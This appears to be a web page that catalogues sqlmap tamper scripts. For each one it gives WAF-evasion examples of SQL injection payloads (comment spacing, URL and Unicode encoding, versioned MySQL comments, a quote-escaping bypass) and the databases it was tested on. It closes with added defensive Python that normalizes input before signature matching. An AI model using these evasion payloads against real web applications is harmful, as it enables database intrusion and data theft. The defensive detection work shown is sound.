space2comment.py
Replaces the space character (' ') with comments '/**/'.
example:
* input: select id from users
* output: select/**/id/**/from/**/users
tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
notes:
* useful to bypass weak and bespoke web application firewalls

------------------------------------------------------------

charencode.py
URL-encodes all characters in a given payload.
example:
* input: SELECT FIELD FROM%20TABLE
* output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
notes:
* useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* the web server will pass the url-decoded version to the back end anyway, hence it should work against any DBMS

------------------------------------------------------------

charunicodeencode.py
Unicode-URL-encodes all characters in a given payload (%uXXXX form).
example:
* input: SELECT FIELD%20FROM TABLE
* output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045
requirement:
* ASP
* ASP.NET
tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
notes:
* useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

------------------------------------------------------------

space2hash.py
Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n').
example:
* input: 1 and 9227=9227
* output: 1%23pttmjopxdwj%0aand%23cwfcvrpv%0a9227=9227
requirement:
* MySQL
tested against:
* MySQL 4.0, 5.0

------------------------------------------------------------

space2morehash.py
Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'); a variant of space2hash.py for newer MySQL versions.
example:
* input: 1 and 9227=9227
* output: 1%23pttmjopxdwj%0aand%23cwfcvrpv%0a9227=9227
requirement:
* MySQL >= 5.1.13
tested against:
* MySQL 5.1.41

------------------------------------------------------------

space2mssqlblank.py
Replaces the space character (' ') with a random blank character from a valid set of alternate characters (Microsoft SQL Server).
example:
* input: select id from users
* output: select%08id%02from%0fusers
requirement:
* Microsoft SQL Server
tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
# ASCII table:
#   SOH  01  start of heading
#   STX  02  start of text
#   ETX  03  end of text
#   EOT  04  end of transmission
#   ENQ  05  enquiry
#   ACK  06  acknowledge
#   BEL  07  bell
#   BS   08  backspace
#   TAB  09  horizontal tab
#   LF   0a  new line
#   VT   0b  vertical tab
#   FF   0c  new page
#   CR   0d  carriage return
#   SO   0e  shift out
#   SI   0f  shift in

------------------------------------------------------------

space2mysqlblank.py
Replaces the space character (' ') with a random blank character from a valid set of alternate characters (MySQL).
example:
* input: select id from users
* output: select%0bid%0bfrom%a0users
requirement:
* MySQL
tested against:
* MySQL 5.1
# ASCII table:
#   TAB  09  horizontal tab
#   LF   0a  new line
#   FF   0c  new page
#   CR   0d  carriage return
#   VT   0b  vertical tab   (MySQL and Microsoft SQL Server only)
#   -    a0  -              (MySQL only)

------------------------------------------------------------

chardoubleencode.py
Double URL-encodes all characters in a given payload (characters that are already encoded are not processed again).
example:
* input: SELECT FIELD FROM%20TABLE
* output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

------------------------------------------------------------

percentage.py
Adds a percentage sign ('%') in front of each character (ASP discards a '%' that does not start a valid escape).
example:
* input: select field from table
* output: %s%e%l%e%c%t %f%i%e%l%d %f%r%o%m %t%a%b%l%e
requirement:
* ASP
tested against:
* Microsoft SQL Server 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0

------------------------------------------------------------

randomcase.py
Replaces each keyword character with a random case value.
example:
* input: INSERT
* output: InsERt
tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0

------------------------------------------------------------

randomcomments.py
Splits SQL keywords with random '/**/' comments.
example: 'INSERT' becomes 'In/**/s/**/ert'

------------------------------------------------------------

versionedmorekeywords.py
Encloses each keyword with a versioned MySQL comment.
example:
* input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
requirement:
* MySQL >= 5.1.13

------------------------------------------------------------

versionedkeywords.py
Encloses each non-function keyword with a versioned MySQL comment.
example:
* input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
requirement:
* MySQL

------------------------------------------------------------

unmagicquotes.py
Wide-character bypass of GPC addslashes: replaces the quote character (') with the multi-byte combination %bf%27 together with a generic comment at the end (to make it work).
example:
* input: 1' and 1=1
* output: 1%bf%27 and 1=1--%20
notes:
* useful for bypassing the magic_quotes/addslashes feature

------------------------------------------------------------

equaltolike.py
Replaces all occurrences of the operator equal ('=') with the operator 'LIKE'.
example:
* input: select * from users where id=1
* output: select * from users where id like 1
tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5

------------------------------------------------------------

halfversionedmorekeywords.py
Adds a versioned MySQL comment before each keyword.
example:
* input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'qdwa'='qdwa
* output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'qdwa'='qdwa
requirement:
* MySQL < 5.1
tested against:
* MySQL 4.0.18, 5.0.22

original address: http://www.myhack58.com/Article/html/3/7/2013/39321.htm
Sqlmap Tamper Bypass WAF
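The common thread in every script listed above is a filter that matches signatures against the raw parameter instead of against what the database will actually see. The example below is added here for this page; it is not sqlmap code and not part of the original article. It shows the canonicalization step a WAF or input filter should run before signature matching: repeated URL decoding (covering the %uXXXX and double-encoded forms), dropping stray '%' signs the way the page says ASP does, treating MySQL comments and the alternate blank bytes from the tables above as separators, and lower-casing. The sample values are the tamper outputs quoted from this page's examples; the signature names, the `normalize` and `matched_signatures` functions and the `PAGE_SAMPLES` table are my own constructions.

```python
"""Canonicalize a request parameter before running WAF signatures.

Added example for this page (not sqlmap's code, not the article's).
Each tamper script above exploits a filter that does not decode
(charencode, charunicodeencode, chardoubleencode, percentage), does not
treat comments or alternate blank bytes as separators (space2comment,
space2hash, space2*blank, versioned*keywords, randomcomments), or
matches case-sensitively (randomcase). Normalizing first closes all three.
"""
import re

_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")   # %u0053 -> 'S'
_PERCENT_ESC = re.compile(r"%([0-9a-fA-F]{2})")    # %53    -> 'S'
_VERSIONED_OPEN = re.compile(r"/\*!\d*")           # /*! or /*!50000
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)    # /* ... */
_LINE_COMMENT = re.compile(r"(#|--[ \t]).*?(?:\n|$)")
# Blank bytes the page lists for MySQL / MSSQL (0x01-0x0f, 0xa0) plus
# space and the rest of the C0 control range.
_BLANKS = re.compile(r"[\x00-\x20\xa0]+")


def percent_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly, handling %uXXXX and double encoding."""
    for _ in range(max_rounds):
        if "%" not in s:
            break
        step = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
        step = _PERCENT_ESC.sub(lambda m: chr(int(m.group(1), 16)), step)
        if step == s:          # nothing left that is a valid escape
            break
        s = step
    # percentage.py relies on classic ASP dropping a '%' that does not
    # start a valid escape; mirror that so %s%e%l%e%c%t becomes select.
    return s.replace("%", "")


def _strip_comments(s: str, block_replacement: str) -> str:
    s = _LINE_COMMENT.sub("\n", s)        # '#random\n' and '-- ' comments
    s = _VERSIONED_OPEN.sub(" ", s)       # keep the keyword inside /*!...*/
    s = _BLOCK_COMMENT.sub(block_replacement, s)
    return s.replace("*/", " ")           # closers orphaned by the line above


def normalize(raw: str) -> tuple:
    """Return (spaced, glued) canonical forms of a parameter value.

    spaced: comments act as whitespace, 'select/**/id' -> 'select id'
    glued:  comments vanish,            'In/**/s/**/ert' -> 'insert'
    Signatures are checked against both, because the page shows a
    comment used both ways.
    """
    decoded = percent_decode(raw).lower()
    spaced = _BLANKS.sub(" ", _strip_comments(decoded, " ")).strip()
    glued = _BLANKS.sub(" ", _strip_comments(decoded, "")).strip()
    return spaced, glued


# Constructed signatures for the handful of patterns the page's examples use.
SIGNATURES = {
    "select-from": re.compile(r"\bselect\b.*\bfrom\b"),
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "insert": re.compile(r"\binsert\b"),
    "tautology": re.compile(r"\b(and|or)\s+(\d+)\s*(=|like)\s*\2\b"),
    "quote-break": re.compile(r"'\s*(and|or)\b"),
}


def matched_signatures(value: str, canonicalize: bool = True) -> set:
    """Names of signatures that fire. canonicalize=False mimics a filter
    that matches the raw parameter (lower-cased only), which is exactly
    what the scripts on this page are written to get past."""
    forms = normalize(value) if canonicalize else (value.lower(),)
    return {name for name, rx in SIGNATURES.items()
            if any(rx.search(form) for form in forms)}


# Tamper outputs quoted from the examples on this page, keyed by script name.
PAGE_SAMPLES = {
    "space2comment": "select/**/id/**/from/**/users",
    "charencode": "%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45",
    "charunicodeencode": "%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045"
                         "%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045",
    "space2hash": "1%23pttmjopxdwj%0aand%23cwfcvrpv%0a9227=9227",
    "space2mssqlblank": "select%08id%02from%0fusers",
    "space2mysqlblank": "select%0bid%0bfrom%a0users",
    "chardoubleencode": "%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544"
                        "%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545",
    "percentage": "%s%e%l%e%c%t %f%i%e%l%d %f%r%o%m %t%a%b%l%e",
    "randomcase": "InsERt",
    "randomcomments": "In/**/s/**/ert",
    "versionedmorekeywords": "1/*!union*//*!all*//*!select*//*!null*/,/*!null*/,/*!concat*/("
                             "/*!char*/(58,122,114,115,58),/*!ifnull*/(cast(/*!current_user*/()"
                             "/*!as*//*!char*/),/*!char*/(32)),/*!char*/(58,115,114,121,58))#",
    "unmagicquotes": "1%bf%27 and 1=1--%20",
    "equaltolike": "select * from users where id like 1",
    "halfversionedmorekeywords": "value'/*!0union/*!0all/*!0select/*!0concat(/*!0char(58,107,112,113,58),"
                                 "/*!0ifnull(cast(/*!0current_user()/*!0as/*!0char),/*!0char(32)),"
                                 "/*!0char(58,97,110,121,58)), null, null#/*!0and 'qdwa'='qdwa",
}

if __name__ == "__main__":
    for name, value in PAGE_SAMPLES.items():
        raw = sorted(matched_signatures(value, canonicalize=False)) or "-"
        canon = sorted(matched_signatures(value))
        print(f"{name:<26} raw={raw}  canonical={canon}")
```

Run as a script it prints, per sample, what a raw-string matcher sees next to what the canonical forms reveal; the encoded and comment-split samples produce nothing on the raw side and at least one hit on the canonical side. Two design points matter in practice: the canonical string is for matching only, and the application must still receive the request bytes it was sent, since rewriting them changes behaviour; and the `glued` form trades a few false positives for catching keywords split by comments, so it is worth a log-only mode before blocking on it. None of this replaces parameterized queries, which remove the injection regardless of how the payload is encoded.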